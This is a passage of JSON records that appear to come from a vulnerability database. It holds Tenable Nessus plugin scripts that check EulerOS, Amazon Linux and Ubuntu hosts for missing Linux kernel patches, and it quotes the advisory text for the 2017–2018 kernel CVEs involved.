Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-07T00:00:00", "title": "EulerOS 2.0 SP2 : kernel (EulerOS-SA-2017-1319)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16649", "CVE-2017-1000410", "CVE-2017-16650", "CVE-2017-16643", "CVE-2017-16644", "CVE-2017-16645"], "modified": "2017-12-07T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-debug-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-debug", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1319.NASL", "href": "https://www.tenable.com/plugins/nessus/105047", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105047);\n script_version(\"3.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-1000410\",\n \"CVE-2017-16643\",\n \"CVE-2017-16644\",\n \"CVE-2017-16645\",\n \"CVE-2017-16649\",\n \"CVE-2017-16650\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : kernel (EulerOS-SA-2017-1319)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the 
remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the processing of incoming L2CAP\n bluetooth commands. Uninitialized stack variables can\n be sent to an attacker leaking data in kernel address\n space.(CVE-2017-1000410)\n\n - The qmi_wwan_bind function in\n drivers/net/usb/qmi_wwan.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16650)\n\n - The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16649)\n\n - The ims_pcu_get_cdc_union_desc function in\n drivers/input/misc/ims-pcu.c in the Linux kernel\n through 4.13.11 allows local users to cause a denial of\n service (ims_pcu_parse_cdc_data out-of-bounds read and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16645)\n\n - The hdpvr_probe function in\n drivers/media/usb/hdpvr/hdpvr-core.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (improper error handling and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16644)\n\n - The parse_hid_report_descriptor function in\n drivers/input/tablet/gtco.c in the Linux kernel before\n 4.13.11 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16643)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1319\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1b266419\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-327.59.59.46.h35\",\n \"kernel-debug-3.10.0-327.59.59.46.h35\",\n \"kernel-debug-devel-3.10.0-327.59.59.46.h35\",\n \"kernel-debuginfo-3.10.0-327.59.59.46.h35\",\n \"kernel-debuginfo-common-x86_64-3.10.0-327.59.59.46.h35\",\n 
\"kernel-devel-3.10.0-327.59.59.46.h35\",\n \"kernel-headers-3.10.0-327.59.59.46.h35\",\n \"kernel-tools-3.10.0-327.59.59.46.h35\",\n \"kernel-tools-libs-3.10.0-327.59.59.46.h35\",\n \"perf-3.10.0-327.59.59.46.h35\",\n \"python-perf-3.10.0-327.59.59.46.h35\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T13:14:08", "description": "A flaw was found in the patches used to fix the 'dirtycow'\nvulnerability (CVE-2016-5195). An attacker, able to run local code,\ncan exploit a race condition in transparent huge pages to modify\nusually read-only huge pages. (CVE-2017-1000405)\n\nLinux kernel Virtualization Module (CONFIG_KVM) for the Intel\nprocessor family (CONFIG_KVM_INTEL) is vulnerable to a DoS issue. It\ncould occur if a guest was to flood the I/O port 0x80 with write\nrequests. A guest user could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2017-1000407)\n\nA BUG in drivers/net/usb/asix_devices.c in the Linux kernel through\n4.13.11 allows local users to cause a denial of service (NULL pointer\ndereference and system crash) or possibly have unspecified other\nimpact via a crafted USB device. (CVE-2017-16647)\n\nA BUG in drivers/media/usb/dvb-usb/dib0700_devices.c in the Linux\nkernel through 4.13.11 allows local users to cause a denial of service\n(BUG and system crash) or possibly have unspecified other impact via a\ncrafted USB device. 
(CVE-2017-16646)\n\nThe ims_pcu_get_cdc_union_desc function in\ndrivers/input/misc/ims-pcu.c in the Linux kernel through 4.13.11\nallows local users to cause a denial of service\n(ims_pcu_parse_cdc_data out-of-bounds read and system crash) or\npossibly have unspecified other impact via a crafted USB device.\n(CVE-2017-16645)\n\nThe parse_hid_report_descriptor function in\ndrivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows\nlocal users to cause a denial of service (out-of-bounds read and\nsystem crash) or possibly have unspecified other impact via a crafted\nUSB device. (CVE-2017-16643)\n\nThe walk_hugetlb_range() function in 'mm/pagewalk.c' file in the Linux\nkernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb\nranges. This allows local users to obtain sensitive information from\nuninitialized kernel memory via crafted use of the mincore() system\ncall. (CVE-2017-16994)\n\nThe qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the Linux\nkernel through 4.13.11 allows local users to cause a denial of service\n(divide-by-zero error and system crash) or possibly have unspecified\nother impact via a crafted USB device. (CVE-2017-16650)\n\nThe usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in\nthe Linux kernel through 4.13.11 allows local users to cause a denial\nof service (divide-by-zero error and system crash) or possibly have\nunspecified other impact via a crafted USB device. (CVE-2017-16649)\n\nA vulnerability was found in the Linux kernel when peeling off an\nassociation to the socket in another network namespace. All transports\nin this association are not to be rehashed and keep using the old key\nin hashtable, thus removing transports from hashtable when closing the\nsocket, all transports are being freed. Later on a use-after-free\nissue could be caused when looking up an association and dereferencing\nthe transports. 
(CVE-2017-15115)", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-26T00:00:00", "title": "Amazon Linux AMI : kernel (ALAS-2017-937) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0861", "CVE-2017-16649", "CVE-2017-15115", "CVE-2017-16994", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2017-16650", "CVE-2017-16643", "CVE-2016-5195", "CVE-2017-1000405", "CVE-2017-16645"], "modified": "2017-12-26T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:kernel-tools-debuginfo", "p-cpe:/a:amazon:linux:kernel", "p-cpe:/a:amazon:linux:kernel-doc", "p-cpe:/a:amazon:linux:perf", "p-cpe:/a:amazon:linux:kernel-tools", "p-cpe:/a:amazon:linux:kernel-devel", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:amazon:linux:kernel-debuginfo", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686", "p-cpe:/a:amazon:linux:perf-debuginfo", "p-cpe:/a:amazon:linux:kernel-tools-devel", "p-cpe:/a:amazon:linux:kernel-headers", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-937.NASL", "href": "https://www.tenable.com/plugins/nessus/105422", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-937.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105422);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\"CVE-2017-0861\", \"CVE-2017-1000405\", \"CVE-2017-1000407\", \"CVE-2017-15115\", \"CVE-2017-16643\", \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\");\n script_xref(name:\"ALAS\", value:\"2017-937\");\n\n script_name(english:\"Amazon Linux AMI : kernel (ALAS-2017-937) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n 
attribute:\"synopsis\",\n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A flaw was found in the patches used to fix the 'dirtycow'\nvulnerability (CVE-2016-5195). An attacker, able to run local code,\ncan exploit a race condition in transparent huge pages to modify\nusually read-only huge pages. (CVE-2017-1000405)\n\nLinux kernel Virtualization Module (CONFIG_KVM) for the Intel\nprocessor family (CONFIG_KVM_INTEL) is vulnerable to a DoS issue. It\ncould occur if a guest was to flood the I/O port 0x80 with write\nrequests. A guest user could use this flaw to crash the host kernel\nresulting in DoS. (CVE-2017-1000407)\n\nA BUG in drivers/net/usb/asix_devices.c in the Linux kernel through\n4.13.11 allows local users to cause a denial of service (NULL pointer\ndereference and system crash) or possibly have unspecified other\nimpact via a crafted USB device. (CVE-2017-16647)\n\nA BUG in drivers/media/usb/dvb-usb/dib0700_devices.c in the Linux\nkernel through 4.13.11 allows local users to cause a denial of service\n(BUG and system crash) or possibly have unspecified other impact via a\ncrafted USB device. (CVE-2017-16646)\n\nThe ims_pcu_get_cdc_union_desc function in\ndrivers/input/misc/ims-pcu.c in the Linux kernel through 4.13.11\nallows local users to cause a denial of service\n(ims_pcu_parse_cdc_data out-of-bounds read and system crash) or\npossibly have unspecified other impact via a crafted USB device.\n(CVE-2017-16645)\n\nThe parse_hid_report_descriptor function in\ndrivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows\nlocal users to cause a denial of service (out-of-bounds read and\nsystem crash) or possibly have unspecified other impact via a crafted\nUSB device. (CVE-2017-16643)\n\nThe walk_hugetlb_range() function in 'mm/pagewalk.c' file in the Linux\nkernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb\nranges. 
This allows local users to obtain sensitive information from\nuninitialized kernel memory via crafted use of the mincore() system\ncall. (CVE-2017-16994)\n\nThe qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the Linux\nkernel through 4.13.11 allows local users to cause a denial of service\n(divide-by-zero error and system crash) or possibly have unspecified\nother impact via a crafted USB device. (CVE-2017-16650)\n\nThe usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in\nthe Linux kernel through 4.13.11 allows local users to cause a denial\nof service (divide-by-zero error and system crash) or possibly have\nunspecified other impact via a crafted USB device. (CVE-2017-16649)\n\nA vulnerability was found in the Linux kernel when peeling off an\nassociation to the socket in another network namespace. All transports\nin this association are not to be rehashed and keep using the old key\nin hashtable, thus removing transports from hashtable when closing the\nsocket, all transports are being freed. Later on a use-after-free\nissue could be caused when looking up an association and dereferencing\nthe transports. 
(CVE-2017-15115)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-937.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Run 'yum update kernel' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"kernel-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-debuginfo-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-4.9.70-22.55.amzn1\")) flag++;\nif 
(rpm_check(release:\"ALA\", reference:\"kernel-devel-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-doc-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-headers-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-debuginfo-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-devel-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-4.9.70-22.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-debuginfo-4.9.70-22.55.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-i686 / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T07:25:06", "description": "It was discovered that a race condition leading to a use-after-free\nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that a use-after-free vulnerability existed in the\nnetwork namespaces implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-15129)\n\nAndrey Konovalov discovered that the usbtest device driver in the\nLinux kernel did not properly validate endpoint metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). 
(CVE-2017-16532)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the\nLinux kernel did not properly validate device metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB\ndriver in the Linux kernel did not properly validate device\ndescriptors. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in\nthe Linux kernel did not properly handle detach events. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2017-16646)\n\nAndrey Konovalov discovered that the ASIX Ethernet USB driver in the\nLinux kernel did not properly handle suspend and resume events. A\nphysically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-16647)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not\nproperly validate device descriptors. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-16650)\n\nIt was discovered that the HugeTLB component of the Linux kernel did\nnot properly handle holes in hugetlb ranges. A local attacker could\nuse this to expose sensitive information (kernel memory).\n(CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux kernel did not\nproperly restrict access to the connection tracking helpers list. 
A\nlocal attacker could use this to bypass intended access restrictions.\n(CVE-2017-17448)\n\nIt was discovered that the netfilter passive OS fingerprinting\n(xt_osf) module did not properly perform access control checks. A\nlocal attacker could improperly modify the system-wide OS fingerprint\nlist. (CVE-2017-17450)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux\nkernel contained an out-of-bounds read when handling memory-mapped\nI/O. A local attacker could use this to expose sensitive information.\n(CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm\nimplementations in the Linux kernel did not properly handle\nzero-length inputs. A local attacker could use this to cause a denial\nof service (system crash). (CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the\nstate of the underlying cryptographic hash algorithm. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel\ndid not properly check permissions when a key request was performed on\na task's default keyring. A local attacker could use this to add keys\nto unauthorized keyrings. (CVE-2017-17807)\n\nIt was discovered that a race condition existed in the OCFS2 file\nsystem implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the\nLinux kernel did not properly validate Generic Segment Offload (GSO)\npacket sizes. An attacker could use this to cause a denial of service\n(interface unavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS)\nimplementation in the Linux kernel contained an out-of-bounds write during\nRDMA page allocation. 
An attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2018-5332)\n\nMohamed Ghannam discovered a NULL pointer dereference in the RDS\n(Reliable Datagram Sockets) protocol implementation of the Linux\nkernel. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2018-5333)\n\nFan Long Fei discovered that a race condition existed in loop block\ndevice implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-5344).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-05T00:00:00", "title": "Ubuntu 17.10 : linux-raspi2 vulnerabilities (USN-3617-3)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-17450", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-0861", "CVE-2017-17805", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16645", "CVE-2017-17806"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:17.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.13-raspi2"], "id": "UBUNTU_USN-3617-3.NASL", "href": "https://www.tenable.com/plugins/nessus/108840", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3617-3. 
The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108840);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2020/01/23\");\n\n script_cve_id(\"CVE-2017-0861\", \"CVE-2017-15129\", \"CVE-2017-16532\", \"CVE-2017-16537\", \"CVE-2017-16645\", \"CVE-2017-16646\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\", \"CVE-2017-17448\", \"CVE-2017-17450\", \"CVE-2017-17741\", \"CVE-2017-17805\", \"CVE-2017-17806\", \"CVE-2017-17807\", \"CVE-2017-18204\", \"CVE-2018-1000026\", \"CVE-2018-5332\", \"CVE-2018-5333\", \"CVE-2018-5344\");\n script_xref(name:\"USN\", value:\"3617-3\");\n\n script_name(english:\"Ubuntu 17.10 : linux-raspi2 vulnerabilities (USN-3617-3)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that a race condition leading to a use-after-free\nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that a use-after-free vulnerability existed in the\nnetwork namespaces implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2017-15129)\n\nAndrey Konovalov discovered that the usbtest device driver in the\nLinux kernel did not properly validate endpoint metadata. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). 
